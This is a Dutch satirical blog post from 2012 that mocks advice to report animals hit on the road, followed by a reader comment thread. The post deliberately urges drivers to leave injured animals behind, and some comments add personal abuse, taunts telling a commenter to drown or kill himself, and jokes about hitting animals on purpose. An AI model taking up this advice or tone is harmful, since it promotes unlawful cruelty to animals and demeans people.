Tendentieus, ongefundeerd & nodeloos kwetsend

Dier aangereden? Bel <s>144</s> 112!

roadkillisepic.jpgWat moet u doen als u een dier heeft aangereden? Bijvoorbeeld een vos? Nou? Weet u niet, zeker. Nooit over nagedacht en zo. Komt het even goed uit dat de Stentor vandaag aandacht besteed aan dat dilemma. Gerrit Hobbelink, Chef Aan Gort Gereden Wild & Personeelsuitjes van Groen Netwerk, legt het even uit: "Altijd de meldkamer bellen, 112. Ook als een dier dood is. Altijd de meldkamer bellen en bij het gewonde dier blijven. De politie alameert een boa of iemand van het Groen Netwerk. Binnen 20 of 25 minuten is de boa ter plaatse [...] Doorrijden na een aanrijding is strafbaar. Een gewond dier laten creperen is ook strafbaar." De neuq? Wat denk je zelf, Gerrit? Dat we niks beters te doen hebben dan na een avondje stappen met drie bezopen vrienden te koukleumen naast een volledig geplette egel? Of onderweg naar werk een kapot konijn te reanimeren uit angst voor arrestatie want anders strafbaar? En dan hebben we het nog over bijzondere of lieve diertjes. Want waar ligt de grens, Gerrit? Moeten we ook stoppen en 112 bellen als we een kikker in de naden van onze winterband rijden? Of voor elke slak stoppen die we slopen als ze na een regenbui massaal de weg oversteken? Geldt dat 112 bellen ook voor elke insect die zich tegen onze voorruit aan kamikaast? En wat als het andersom is? Je ziet deze antilope toch ook niet direct zijn gsm uit zijn binnenzak halen, lijkt ons. Hier is een idee voor Gerrit en zijn Groen Netwerk: we doen het gewoon niet. Moeten die beesten maar uitkijken met oversteken. Het asfalt respecteren. Snappen dat ze niet winnen van een SUV. Oprotten, is onze weg. Wij niet in de bossen met onze auto's, zij niet op onze N-wegen. En zeker niet 112 lastig vallen met dit soort aperte dierenknuffelarij. Ze hebben een miljoenmiljard jaar de tijd gehad om ons voorbij te evoluëren, maar waren te druk met neuqen en vreten. Eigen schuld, dikke bandensporen in je rug. Stop deze waanzinnig idiote DionGrausificatie van dieren. Dankzij Gerrit al die AnimalCops voor niks opgeleid. En bedankt. Update: Ojee. Gezeik. 144. Drink meer BIERRR.

Reaguursels

Inloggen

Gaat weer helemaal nergens over hier, 114 is ingesteld als het nummer van de DIERENPOLITIE, dus niet alleen als er een hond aan is gereden, OOK als er zoals wel gebeurt ergens verwaarloosde dieren zitten, zoals in gewone huizen. Of zoals die boer die verwaarloosde paarden op zijn erf had staan. Geenstijl, je zit alleen maar te zeiken op anderen, 114 zal goede dingen doen, probeer maar eens te zeiken op 112 als je vader op sterven ligt.

Necramonium | 08-01-12 | 23:25

Ik kwam van rechts.

Mr. Mong | 08-01-12 | 15:14

Zo'n dier prop je gewoon in een General Electric oven uit 1958. Of je laat dat doen door een snol zonder tieten met schoenmaat 47.

artie | 08-01-12 | 14:49

@Heinzelmann | 08-01-12 | 04:10
Nepberichten over PVVérs plaatsen is het nieuwe bash beleid

Karel de Kleine | 08-01-12 | 12:42

Johnny Quid in grootse vorm... hulde voor dit sarcasme... lust ik wel pap van.

pielewaaier | 08-01-12 | 11:04

Een beetje respect voor dieren is voor watjes.

C. van der Laak | 08-01-12 | 06:35

Als dierenvriend geef ik al het aangereden wild, vrijwillig, een neqschot.

Xioniet | 08-01-12 | 04:54

*update*
PVV'er de Roon misbruikt 144 toch niet

pastebin.com/rYW3zDV3

(Pastebin? TWF?)

Heinzelmann | 08-01-12 | 04:10

kwaakblaak | 07-01-12 | 20:55
Hulde!

Pffffff | 07-01-12 | 23:49

Ik ken iemand die reed een zwijn aan. Het was een heel gesjouw om het in de aanhangwagen te krijgen, maar je kon er meer dan de halve winter van eten.

henriette | 07-01-12 | 22:43

ecologiste | 07-01-12 | 19:38 |
Dan maar tien minuten eerder op de thee bij la fille de mon age ondanks l'amour s'en va.

WirMachenMusik | 07-01-12 | 21:11

Dieren opeten.......
ieder het zijne, ook ik houd van een stukkie vlees, maar focus je nu eens op de toonzetting van het stuk waar we op reageren...
dat is bij de beesten af, en dat er nog mensen zijn die dit moeten gaan verdedigen, zelfde slag als de schrijver, volledig van god los, en totaal geen compassie met anderen, totdat een familielid wordt aangereden door en dronken randdebiel, want dan moet die middeleeuws gemarteld worden, en op zijn minst doodgekookt.

kwaakblaak | 07-01-12 | 20:55

Als je een Bambi aanrijdt, gewoon in je kofferbak stoppen en inleveren bij de plaastelijke slager. Dan krijg je als dank nog wat lekkere hertenbiefstukjes kado.

Gootbalkoning | 07-01-12 | 20:22

Tja, dilemma's, als Marijke Vos wordt aangereden, bel je dan 112, 114 of neem je wat extra foto's met je smartphone?

illuvatar | 07-01-12 | 20:11

Vooropgesteld dat het dier niet in gezelschap is van een begeleider: aan een dier kun je je identiteit niet kenbaar te maken, dus overtreden van artikel 7 WVW is niet aan de orde, bel 112 en meldt het en klaar. En een dood dier kun je laten liggen zolang het geen huisdier is (hond/kat).

casagrande | 07-01-12 | 20:04

miko | 07-01-12 | 19:53 | + 0 -

Ik moet maandag weer werken dus dan zie je me een stuk minder waarschijnlijk.

Behouden vaart iig.

pius | 07-01-12 | 19:58

@pius | 07-01-12 | 19:49
Nee ga maar wat plempen op GS.Dat heb je de laatste tijd niet al teveel gedaan.Ik stop er ook eens mee ik ga een stukje varen denk ik.

miko | 07-01-12 | 19:53

cucaracha | 07-01-12 | 19:45 | +

Heb hem al gezien die film en geen zin in een boek. Straks teeuwen geloof ik.

pius | 07-01-12 | 19:49

@ecologiste | 07-01-12 | 19:38 |
Ik heb geen auto ... ik heb geen tv. Ik schrijf boeken. Ik ben nu bezig met nummer 5. Dank je voor de tip, ik ga wel bij piratebay langs voor de herhaling, ik zie je graag weer hier terug. Bon appetit.

A.Th. | 07-01-12 | 19:48

miko | 07-01-12 | 19:40 | + 2 -

In the name of the king met jason statham.

pius | 07-01-12 | 19:48

pius | 07-01-12 | 19:38 | + 0 -

Ik zou bij de film aanschuiven, meer kudt dan 't volgende topic kan het niet zijn

cucaracha | 07-01-12 | 19:45

@DANNY3960 | 07-01-12 | 19:24
Dat heet sanitatie van de leefomgeving. Treurig, dat wel, maar mensen moeten ook ergens kunnen leven. ... goeie kans dat ze terugkomen als landbouwmest. ... Mensen zijn ook dieren en hebben ook rechten, hoe vreemd dat ook mag klinken, en voor hun koters moeten ze af en toe de troep opruimen, of het nu leuk is of niet. We moeten het samen maar zien te brouwen, met alle planten en dieren, en mensen zijn om een redelijke wijze priotiteit nummer een. 30 km buffels afknallen voor de lol is een ding, sanitatie is een ander ding. Pech voor de beesten, maar over kakkerlaken doen we ook niet moeilijk, en zijn toch ook dieren die vechten voor hun bestaan.

A.Th. | 07-01-12 | 19:44

@pius | 07-01-12 | 19:35
Ik wil geen weekend-verpester zijn, maar ik denk het niet.

Jackanders | 07-01-12 | 19:40

@pius | 07-01-12 | 19:38
Wat zit ze te kijken? Een on the roadkill movie?

miko | 07-01-12 | 19:40

A.Th. | 07-01-12 | 19:32 |
.
Minder koters = minder handen aan het bed + straks jouw poepluiers verschonen. Laat de bevolkingsafname in hemelsnaam over aan moeder natuur + moeder aarde x de oorlog zuchtige en donkere kant van de menselijke natuur... maar STOP met al die overheidsbemoeienis + meer asfalt. Vanzelfsprekend. De paus kan sowieso de pot op. Duidelijk zo?

Bertus Betonsloper | 07-01-12 | 19:39

Beste redactie. Mijn vriendin zit film te kijken en ik zit hier in hoopvolle afwachting van een nieuw topic.

Dan bent u ook weer op de hoogte.

pius | 07-01-12 | 19:38

A.Th. | 07-01-12 | 19:19

Merci mon pôte. En voor de nostalgie vanavond ARTE 10 voor 10 Françoise Hardy. maintenant c'est le diner. À la vôtre!

ecologiste | 07-01-12 | 19:38

@DANNY3960 | 07-01-12 | 19:24
Overal in de derde wereld waar je veel zwerfhonden ziet vraag je je af of het inderdaad niet beter is om ze af te maken.Graatmager onder de schurft en open wonden.
In Haïti liepen ze ook vaak rond ons terrein.Ik sla echt niet graag een hond dood maar ik moet zeggen dat ik daar vaak de indruk had dat ik een goede daad deed.

miko | 07-01-12 | 19:37

Nu nieuw in ons restaurant: you kill it, we grill it.

schweinehund | 07-01-12 | 19:35

Nu nieuw in ons restaurant: you kill it, we grill it.

schweinehund | 07-01-12 | 19:35

Jackanders | 07-01-12 | 19:32

Mooie metafoor. Al word de vraag natuurlijk steeds meer, krijgen ze die Auto nog wel aan de gang in de toekomst.

pius | 07-01-12 | 19:35

Stel je voor dat je een dier zou redden ja! 112 bellen is overdreven; ik zou het dier meenemen en langs een dierenarts rijden ipv wachten.

Kunera | 07-01-12 | 19:33

@pius | 07-01-12 | 19:20
Zo is het, wij zijn druk met evolueren, terwijl bijvoorbeeld zo'n krokodil dat helemaal niet nodig heeft gehad.
Die kwam nagenoeg perfect van de tekentafel af.
Eigenlijk moet dat ge-evolueer gezien worden als massaal terug gaan naar de garage met de nieuwe ootoo, omdat er een ontwerp-fout in geslopen is.

Jackanders | 07-01-12 | 19:32

@Bertus Betonsloper | 07-01-12 | 19:23
Maar ze heeft wel een punt. En zeker beter dan dat van moeder Teresa. Meer kapotjes = minder koters = minder auto's = meer toekomst. En minder platte beesten natuurlijk, laten we wel bij de discussie blijven.

A.Th. | 07-01-12 | 19:32

DANNY3960 | 07-01-12 | 19:24 | + 0 -
Oekraïne gaat toch ook een dergelijke actie uitvoeren, vóór het ek ?

Rammstein | 07-01-12 | 19:30

DANNY3960 | 07-01-12 | 19:24

Ik ben een hypocriet ik weet het maar dit soort dingen gaan bij mij door merg en been.

pius | 07-01-12 | 19:28

Tip: eet uw roadkill gewoon op.

Semolina Pilchard | 07-01-12 | 19:27

DANNY3960 | 07-01-12 | 19:24 | + 0 -
Sad, sad, sàd !

Rammstein | 07-01-12 | 19:25

Reed in mijn eerste rijles een hele kolonie vogels plat. Gewoon doorrijden is de regel.

BuigenofBarsten | 07-01-12 | 19:25

ecologiste | 07-01-12 | 19:18 | Ja hallo... ben toch zeker Marcus Junius niet.

Bertus Betonsloper | 07-01-12 | 19:23

@insemismeer | 07-01-12 | 18:32 |
je kan opletten wat je wilt, als bambi de weg opspringt vanuit de struiken en dat gebeurt 10 meter voor je, dan rem je helemaal niks meer, niet met 80, niet met 70, zelfs niet met 30.. Wel is het zo dat met 50 de kans dat de maag van het dier knapt en het vlees onbruikbaar wordt, een stuk kleiner dan bij 80...

KlopKlop | 07-01-12 | 19:22

miko | 07-01-12 | 19:08

*lachen moet*

pius | 07-01-12 | 19:22

Het enige werkelijk gewonde dier is natuurlijk de mens die als een kudde gnoes aan de oversteek van een rivier propvol met krokodillen gaat beginnen.

pius | 07-01-12 | 19:20

@ecologiste | 07-01-12 | 19:01 | + 1 -
Exact. Je t'aime pour tes pensees. Mettre le soi dessus l'autour est le bonne route pour la destruction de toute ça. Faut changer la route des pensees pour continuer notre route dans la evolution sans la destruction de toute la humanité. J'en travaille aussi chaque jour, et ben, peut être nous voyons le jous de la bonheure enfin?

Bon courage, et en cas, bonne route.

A.Th. | 07-01-12 | 19:19

Ik las ooit Herodotus's geschiedenisboeken. Er was eens een heerser die zo de pest aan zijn volk had dat hij vreselijk veel wetjes maakte. Iedereen móest die wet hoe dan ook overtreden. L'histoire se répète.

AntiSoof | 07-01-12 | 19:19

Bertus Betonsloper | 07-01-12 | 19:07

Ook gij Brutus?

ecologiste | 07-01-12 | 19:18

Vuurpijlmuis is dood!! Welk nummer??

Armageddon2012 | 07-01-12 | 19:10

Nu hierboven het CDA in de draad genoemd wordt zal ik straks de staatssecretaris van landbouw van een ieder de stijlloze groeten doen. Gewoon omdat het kan!

eerstneukendanpraten | 07-01-12 | 19:08

Kinderen maken van jouw centjes? Daar heeft iedereen zijn of haar eigen gereedschap voor, ecologiste | 07-01-12 | 19:03 |... en jouw centjes geenszins bij nodig.
.
Zure pruim.

Bertus Betonsloper | 07-01-12 | 19:07

en deze domkoppen van de pvv leven en eten rijkelijk van ons belastinggeld, laat ze een ander baantje zoeken dat niet door word gefinancierd door de belastingbetaler!

opvliegende steen | 07-01-12 | 19:07

A.Th. | 07-01-12 | 18:55

Affirmatif et enchanté.

ecologiste | 07-01-12 | 19:06

heb vorig jaar 112 gebeld omdat er een hond (formaatje herdershond) op de snelweg liep. kreeg daar te horen dat voor dat soort onzin 112 niet lastiggevallen dient te worden..... dingen zijn nu anders? of moet ik m eerst aanrijden en dan pas bellen?

wim kokring | 07-01-12 | 19:04

Bertus Betonsloper | 07-01-12 | 18:57

Van mij mag iedereen doen wat hij wil maar gen kinderen maken met mijn centen en die paus is een moordenaar omdat hij het verdomd het condoom te heiligen. Lulhannes.

ecologiste | 07-01-12 | 19:03

jpboom | 07-01-12 | 18:55

Dat had wel wat bloemrijker en begaafder gemogen die diss van jou.

Nu is je lot waarschijnlijk bezegeld.

pius | 07-01-12 | 19:02

A.Th. | 07-01-12 | 18:52

Voilà. We moeten de realiteit onder ogen zien en toch fantastisch blijven dromen om de juiste conclusies te trekken in de huidige omstandigheden. Kwestie van combineren. Kennis genoeg maar inzicht daar ontbreekt het te vaak aan maar dat komt omdat vooral omdat het eigenbelang het vrije denken in de weg zit. Uiteindelijk een deaudlopende weg in evolutieland.

ecologiste | 07-01-12 | 19:01

miko | 07-01-12 | 18:07

Geen idee. Ik heb geen auto.

pius | 07-01-12 | 18:58

ecologiste | 07-01-12 | 18:44 |
.
Wat dacht je ervan om iedereen de Vrijheid te gunnen z'n leven in te delen zoals 'ie dat zelf wil, of dat nu met of zonder kids is, kinderbijslag of geen kinderbijslag?

Bertus Betonsloper | 07-01-12 | 18:57

@miko | 07-01-12 | 18:51
Het CDA? Als er misdadigers een partij zouden beginnen dan zouden zij zich waarschijnlijk de Partij vd Heiligen noemen.

AntiSoof | 07-01-12 | 18:56

@ecologiste | 07-01-12 | 18:34 | + 1 -
Ça peut être beaucoup plus grave ma cherie. C'est juste que j'ai envie ce jour. C'est tout. Bisous.

A.Th. | 07-01-12 | 18:55

De schrijfstijl van de heer Johnny Quid is om te huilen. Het is net een kleuter die de verkeerde spuit op zijn strot heeft gezet. Alleen walging en kots komen naar boven door de slecht onderbouwde kinderlijke meningen. Volgens mij zit Johnny op dit moment op zijn lul en is zich aan het verkneukelen op de kip die hij gaat naaien.

jpboom | 07-01-12 | 18:55

Uitstekende obeservatie mijheer Quid!
Het moet maar eens afgelopen zijn met die selectieve verontwaardiging van dierenactivisten, een malariamug is net zo veel dier als een knuffel Page-pup!

Dooby | 07-01-12 | 18:52

@ecologiste | 07-01-12 | 18:26 |
Gans mee eens. En om een andere reaguurder aan te halen, in nederland is geen natuur meer. Jammer maar helaas, het is een rivierdelta en de toegangspoort tot Europa, met een achterland van 300.000.000 mensen die gewoon handel drijven. Dus laten we prakisch blijven en het jammer vinden van die platte egel, maar geen rare fratsen uithalen waar dat niet kan. Of de boevenvangers onnodig belasten met jammer-maar-helaas hij sprong ervoor en is nu plat. Simpelweg je hersens gebruiken is meer dan genoeg, dat kan de gemiddelde burger best aan. Nederland wil zo graag een kennisland zijn, welnu, men is bij kennis voldoende voor dit soort shit. Daar hebben we geen caviacops voor nodig, dat is geldverspilling.
Overigens heb ik mijn rijbewijs laten verlopen en rij geen auto meer, gezien al die maniaken, de nadere ondergang en zoveel meer.

A.Th. | 07-01-12 | 18:52

@AntiSoof | 07-01-12 | 18:50
Maar dat is de CDA kant van het kabinet.

miko | 07-01-12 | 18:51

@sufkut | 07-01-12 | 18:44
Huisdier huis-dier.Moeten ze hun beest maar binnen houden.

miko | 07-01-12 | 18:50

Nee, geweldig die dierenpolitie. En dan wél de ganzen vergassen omdat ze de vliegtuigen in de weg vliegen? En om economische redenen heel veel dieren stuk maken zoals bij de MKZ-crisis? Nee, echt geweldig.

AntiSoof | 07-01-12 | 18:50

@Bart_Bart | 07-01-12 | 18:34
Gezien de reacties hier.Mijn kolenbranders hebben meer sympathie.Kunnen zo liev huilen.
En dollefijnen natuurlijk.Altijd maar lachu.

miko | 07-01-12 | 18:49

@Superior Bastard | 07-01-12 | 18:38
Fijn dat jij het voor de eendjes opneemt. En je prioriteiten dus goed weet te stellen.

As we speak zit je nu in het Dierenjournaal, en zullen ze jou sparen, wanneer ze de wereld overnemen.

Bart_Bart | 07-01-12 | 18:47

Het is wel fijn voor 't beestje dat iemand er of snel een einde aan maakt danwel inderdaad de dierenambulance belt. Ook is het prettig voor de eigenaar (denk aan de kinderen) om te weten wat er met hun huisdier is gebeurd. Het moet alleen geen halszaak zijn maar een kwestie van fatsoen vind ik. Een mus of vlieg vind ik wat anders dan een huisdier of zeg een ree, koe of paard. Het lijkt me in ieder geval nooit prettig om mee te maken. Krijg je zo'n agent die weer tien keer moet schieten ook nog.

sufkut | 07-01-12 | 18:44

Bertus Betonsloper | 07-01-12 | 18:38

Wat dacht je van geen kinderbijslag meer?

ecologiste | 07-01-12 | 18:44

"Ze hebben een miljoenmiljard jaar de tijd gehad om ons voorbij te evoluëren"

Geniaal...!!

Dat zal ze leren..

Hulde @ johnny

neonreclame | 07-01-12 | 18:43

kwaakblaak | 07-01-12 | 18:25
Dieren mag je ook opeten, maar zodra je een mens opeet, vlieg je de gevangenis in. Dat vind jij zeker ook raar?

bintang | 07-01-12 | 18:43

Bart_Bart | 07-01-12 | 18:40 | + 0 -
Nee, houd jij je linkjes maar, grappenmaker.

Rammstein | 07-01-12 | 18:41

@kwaakblaak | 07-01-12 | 18:25
Nee een konijn met een dubbele ruggengraat breuk en een ingeklapte long.Daar moet je echt twee hulpverleners voor bellen.Typh op.Gaat er niet over dat je een beest dood rijdt dat je dat leuk vind maar ik wil bij een hopeloos geval niet wachten op twee andere hopeloze gevallen met een badge.
www.google.com/search?tbm=isch&hl...
die me vertellen ja meneer sorry maar hier is niks meer aan te doen.Aangereden beesten ,mits niet meer geschikt voor menselijke consumptie. pleuren we terug de berm in.Is goed voor doodgravers en andere aaseters want daar hebben we er al veel te weinig van door alle parkbeheerders(lees natuur beschermers) in Nederland

miko | 07-01-12 | 18:40

Bertus Betonsloper | 07-01-12 | 18:38 | + 0 -

Ophangen aan d'er okselhaar?

cucaracha | 07-01-12 | 18:40

@Rammstein | 07-01-12 | 18:36
Ik ben toevallig een bonobo aap.

Een hele slimme, dat wel. Hier ben ik te zien:
www.youtube.com/watch?v=JUsDsELhsw4

Bart_Bart | 07-01-12 | 18:40

Als ik een dier aanrijd, schiet ik het per raket naar het dichtstbijzijnde dierenhospitaal.

Al SchietjemeLevend | 07-01-12 | 18:39

ecologiste | 07-01-12 | 18:35 | Ok. Hoe ga je het doen? Pillen? Of toch head first van een ecologische woontoren?

Bertus Betonsloper | 07-01-12 | 18:38

Bart_Bart | 07-01-12 | 18:27 | + 0 -
Knoop dat blok beton maar aan je been en spring in de plomp. Idioot.

Superior Bastard | 07-01-12 | 18:38

Bart_Bart | 07-01-12 | 18:34 | + 0 -
Denk jij dat maar.
Jij staat dichter bij de apen dan je denkt.
Oh enneh ..... Marktplaats ? Not my thing.

Rammstein | 07-01-12 | 18:36

Bertus Betonsloper | 07-01-12 | 18:30

Zeker beste man.

ecologiste | 07-01-12 | 18:35

Supergamer | 07-01-12 | 18:33 | + 0 -

KAPSLOCK ermee, lutser

cucaracha | 07-01-12 | 18:35

@Supergamer | 07-01-12 | 18:33
Nu nog een CAPS-politie, zitten we helemaal goed...

Jackanders | 07-01-12 | 18:34

@Rammstein | 07-01-12 | 18:28
Shit, nu krijg ik helemaal geen marktplaats berichtje meer van Rammstein.

Ik chargeerde met dat blok beton. Maar laat ik het zeau zeggen: De meest 'aapachtige' mens (een of andere drug addict) heeft nog altijd een tien keer zo sterk 'gevoelsleven' (bewustzijn) dan het meest geëvolueerde diertje.

Dus ja, waar moet je dan je empathisch pijlen op richten?

Bart_Bart | 07-01-12 | 18:34

Supergamer | 07-01-12 | 18:33 | + 0 -
Schreeuw niet zo.

Rammstein | 07-01-12 | 18:34

A.Th. | 07-01-12 | 18:23

Oh-la-la-la. Vous-êtes un vrais purist. Ik rommel meestal maar wat aan op dat toestenbord, letters argh net wilde beesten voor mij. Vorm of vent, maokt mie niet oet beste man. En wel bedankt voor uw welbetegdle reactie want daar kan ik zeker van genieten. Een goede purist is een als een parelende droge champagne. Santé A. Th. or what the F.

ecologiste | 07-01-12 | 18:34

-weggejorist-

Supergamer | 07-01-12 | 18:33

Mensen kunnen misschien ook eens een keer opletten tijdens het rijden uiteraard.
Dus niet als een godsgestoorde mongool over de weg hen crossen, dan zal ik ook zeker geen traan laten als je jezelf aan gort of invalide rijd.
Jammer Quid, vond je altijd erg leuk schrijven.
Maar helaas deze keer dus niet, prutser.

insemismeer | 07-01-12 | 18:32

ecologiste | 07-01-12 | 18:26
.
Je ziet de bevolkingsgroei het liefst omgebogen naar krimp? Een betere wereld begint bij jezelf zou ik zeggen...

Bertus Betonsloper | 07-01-12 | 18:30

@Rara
Maakt niet uit, naïeve dierenknuffelaars die zichzelf liever doorrijden ipv een muis/kikker dood te rijden moeten ze zelf weten. Ik rem er niet voor, blijf liever zelf leven en breng anderen niet in gevaar :) Tuurlijk rem ik als het kan, maar naïef dierknuffelaar gaat liever ten alle tijde vol op de rem, ookal zit dan een andere auto in de kofferbak, of bij uitwijkmanoeuvre een auto in de neus. Rationeel nadenken zit er niet in..

SuperRogier | 07-01-12 | 18:29

Bart_Bart | 07-01-12 | 18:27 | + 0 -
Bedoel je dat blok beton voor je hoofd ?

Rammstein | 07-01-12 | 18:28

@kwaakblaak | 07-01-12 | 18:25
Het is meer, dieren staan qua bewustzijn dichter bij een blok beton, dan bij de mens.

Ga jij een blok beton in neaudt helpen?

Bart_Bart | 07-01-12 | 18:27

ZDEV | 07-01-12 | 18:14

Klopt. Dieren lopen in de weg (als ze over de weg lopen). Maar als je ze kunt ontwijken zonder gevaar moet je het gewoon doen natuurlijk. Ik vind trouwens dat er qua natuur veel te veel nadruk op de dieren wordt gelegd. Er zijn ook andere wezens. Laat die dieren zich vermaken op het Franse platteland waar nog veel ruimte is. Maar als er was gebeurd wat ik 40 jaar geleden graag wilde (bevolkingsgroei ombuigen naar sterke krimp) dan zag de wereld er nu weer heel anders uit (en was een behoorlijk deel van de reaguurders eh niet present).

ecologiste | 07-01-12 | 18:26

jezus, wat een kortzichtige en afgezaagd kut stukkie.
Zodra het dieren zijn mag er worden aan en doorgereden, maar zodra er een mens bij berokken is, dan mag de dader aan de hoogste boom worden opgeknoopt.
Want dieren horen in de natuur, en wij op de weg..........

Jouw weggetje kan ook een territorium doorkruisen, LUL!!!!!

Maar ja, da's kut voor die beessies tch..??

kwaakblaak | 07-01-12 | 18:25

aandacht besteedT

bintang | 07-01-12 | 18:23

@ecologiste | 07-01-12 | 18:10
hEEL creabea, ecologiste, maar let op de cAPSLOCK en de spelling. Het is Kleauteneauteaus. En de weg is er voor de eauteaus, en niet voor de dieren. Daar hebben we BOS voor. Dieren+weg=happymeal. Bos+eauteau=eauteauweg.

A.Th. | 07-01-12 | 18:23

ZDEV | 07-01-12 | 18:14 |
.
In Alaska geldt ook het recht van de sterkste. Niet vergeten je gun mee te nemen, want je legt het gegarandeerd af tegen een grizzly of een roedel hongerige wolven.

Bertus Betonsloper | 07-01-12 | 18:20

Voor mij was die Duitser een echte held in Vaals. Hond leeft nog! En 4 kudtheiligekoeien kapodtstukdeaud. Hahaha.http://www.youtube.com/watch?v=7JaCqiv3IWE

ecologiste | 07-01-12 | 18:18

@jaheur | 07-01-12 | 17:32
Bellen kan altijd, maar toen mijn vrouw een hert aanreed was de opmerking 'laat maar liggen, hij gaat toch wel dood.' Weliswaar het dier af moeten maken, maar de politie komt hier niet voor omdat het te vaak voor komt hier waarschijnlijk.

Implant | 07-01-12 | 18:17

@stommehond | 07-01-12 | 17:16
Goedgekozen nick!

La Vie En Rose | 07-01-12 | 18:17

ZDEV | 07-01-12 | 18:14 | + 0 -
Waar moet ik op drukken ?

Rammstein | 07-01-12 | 18:16

@miko | 07-01-12 | 18:07 | + 1 -
Minkukels lopen bij het riagg en zijn al bekend. Blijft over of die door de voorruit is gekomen en je zelf gewond bent geraakt. Zo ja, door naar de eerste hulp. Zo niet, doorrijden mensen, niets te zien.

A.Th. | 07-01-12 | 18:14

Ik heb ook wel eens een hert aangereden.
Een bambi. Zo'n jonkie.
Drie auto's op een N-weg. En een tegenligger
Mama hert wil oversteken.
Springt voor de eerste auto de weg over. Ging net goed.
Bambi wilde erachteraan.
Kreeg ik tussen de koplampen van de SUV.
BAM! Op slag dood.
Het enige dat ik kon doen was doorrijden.
Uitwijken naar links was een frontaaltje geworden.
Uitwijken naar rechts betekende verongelukken in een sloot.
Remmen betekende de achterligger bovenop me.

Spijtig, maar niets aan te doen.
Liever mensenlevens redden dan zo'n hert.
Ben blij dat ik niet in een koekblikje of lage auto reed.

En verder: helemaal eens. Dieren horen n de natuur. In Nederland is geen natuur.
Alleen maar aangelegde bosjes en weilanden en andere menselijke reut. Landschap ja, natuur, nee.

Nederland is van en voor mensen. Natuur vind je in Alaska maar hier geldt het recht van de sterkste. De mens. Darwinisme! Herten hebben geen SUV's uitgevonden. Ik bedoel maar.

Kom je van het platteland, dan ben je het met me eens. Ben je zo'n verwend stadsmeisje dat nog nooit een koe heeft geroken dan kunt u hieronder op de '-' drukken.

ZDEV | 07-01-12 | 18:14

Quid je kunt prachtig jongleren met woordjes dat moet gezegd. Ook onovertroffen in het op cabarateske wijze uitbenen van één enkel argument. Maar overtuigend in de zin van, nu moet ik mijn standpunt wat in de richting van dat van Quid bijstellen, ben je wat mij betreft gelukkig zelden.

WirMachenMusik | 07-01-12 | 18:13

OK als er bij hoog water een Squid oversteekt gewoon doorrijden en laten creperen, nietwaar Johnny? En als je het er niet mee eens bent gebruik dan gVD eens wat meer inkt en schrijf op de weg dat die kleaudtenautos motte oprotte en dan wel watervaste verruf gebruike, octopus.

ecologiste | 07-01-12 | 18:10

@Parel van het Zuiden | 07-01-12 | 17:59 | + 1 -
Je hebt wel en geen gelijk. Wel als je zorgen hebt over krassen in de lak, en geen als je geen zorgen hebt over krassen in de lak. Het hangt er hier dus vanaf of je een pooierbak bestuurt (maar wat zijn dan nog je zorgen met al die poen) of een roestbak voor het woonwerk, en je moet zorgen dat er eten op de plank verschijnt (hoe dan ook). (En waar heb je koeienvangers voor?(Het antwoordt ligt besloten in het woord 'koeienvangers'))

A.Th. | 07-01-12 | 18:09

@vitis | 07-01-12 | 17:55
Druifje, dat geeft alleen maar aan dat de peeveevee een echte partij begint te worden.

miko | 07-01-12 | 18:08

@pius | 07-01-12 | 17:50
En je staat weer op nul!
Als je een minkukel aanrijd moet je die ook aanmelden of toch gewoon naar het ziekenhuis?
Vragen vragen.

miko | 07-01-12 | 18:07

stommehond | 07-01-12 | 17:16 | + -1 -
Is ?

deoudererijperevrouw | 07-01-12 | 17:33 | + 1 -
Jij met je hel ....

Rammstein | 07-01-12 | 18:07

Parel van het Zuiden | 07-01-12 | 17:53
Je rijdt gewoon te hard dat is het, dan blijft het bij een paar toevalstreffers. Gewoon concentreren en het moment afwachten. Een klein tikje is meestal al voldoende. Wel een zwitsers zakmes meenemen, soms zijn ze alleen verdoofd.

sjaakdeslinksesul | 07-01-12 | 18:05

@vitis | 07-01-12 | 17:55 | + 0 -
Waarom? Ze staan zichzelf toch al in de zeik te zetten? Hebben ze onze hulp niet bij nodig.

A.Th. | 07-01-12 | 18:02

@Condominee | 07-01-12 | 17:57 |

Wel een autobeul zo te zien....

Parel van het Zuiden | 07-01-12 | 17:59

@pius | 07-01-12 | 17:50 | + 1 -
Ja, dat ben je ook, maar we vinden je nog steeds aardig.

A.Th. | 07-01-12 | 17:58

-weggejorist-

Condominee | 07-01-12 | 17:57

Zaterdag avond even de pvv afzeiken,
volgende week de pvda dan?

vitis | 07-01-12 | 17:55

sjaakdeslinksesul | 07-01-12 | 17:49 | + 0 -
Ghehe. Humor.

Superior Bastard | 07-01-12 | 17:53

@Van Dikhout | 07-01-12 | 17:40 | + 1 -
Het heeft tot nu geduurd voor het kwartje viel. LOL. 144 bellen dus, en luisteren hoe hard ze daar lachen.

A.Th. | 07-01-12 | 17:53

@sjaakdeslinksesul | 07-01-12 | 17:49 |

Kansloos bij een volwassen exemplaar... Laatste keer dat ik present was bij zo'n touché was de desbetreffende Audi A8 total loss.

Parel van het Zuiden | 07-01-12 | 17:53

Wat
cucaracha | 07-01-12 | 17:33 | + 1 -
zegt.

Bezorgdenverjaagster | 07-01-12 | 17:53

miko | 07-01-12 | 17:40

Dat is zeker normaal ja. De stijllozen roeleren nu eenmaal op GS. En de brussendoctrine doet de rest.

80 procent van de reaguurders, enfin.

Laat mij maar een minkukel zijn.

pius | 07-01-12 | 17:50

Parel van het Zuiden | 07-01-12 | 17:41
Mwah... met een koeienvanger en lichtbak op je astra.

sjaakdeslinksesul | 07-01-12 | 17:49

Kan die Gerrit Homolink niet beter verkeersles aan egeltjes en konijnen geven?

Ulle Ruttelflut | 07-01-12 | 17:47

@JaNeeTochNietDan? | 07-01-12 | 17:35
Toon maar eens aan dan dat het een hoax is. Dat heeft niks met zelf nadenken te maken, arrogant mannetje. Wist je trouwens dat alarmnummers vrij goed zijn in het traceren van bellers?

Bulloch | 07-01-12 | 17:47

Laatst rijd ik een agent aan.
Zegt het edelhert: 'Laat maar, ik neem 'm wel mee.'

Van Dikhout | 07-01-12 | 17:47

Zielige diertjes, altijd + 1. Klopklop heeft overigens gelijk, al twee keer bambi's dagwaarde mogen cashen.

Dhr. W. Anhoop | 07-01-12 | 17:46

Sinds 144 bestaat - in z'n gecastreerde vorm, helaas met uitsluiting van de bio-industrie waar dierenmishandeling de norm is - wordt het kaf (stoere jannen die héél veel van hun met water ingespoten hormonenschnitzel houden en dierenmishandeling best wel OK vinden) toch wel effe snel van het koren gescheiden, hè Quid?

Aktivist | 07-01-12 | 17:45

HTML5 is duidelijk ook nog niet af...

Tommygunner | 07-01-12 | 17:45

@vandikhout:
Dan zul je door menigeen benijd worden denk ik.

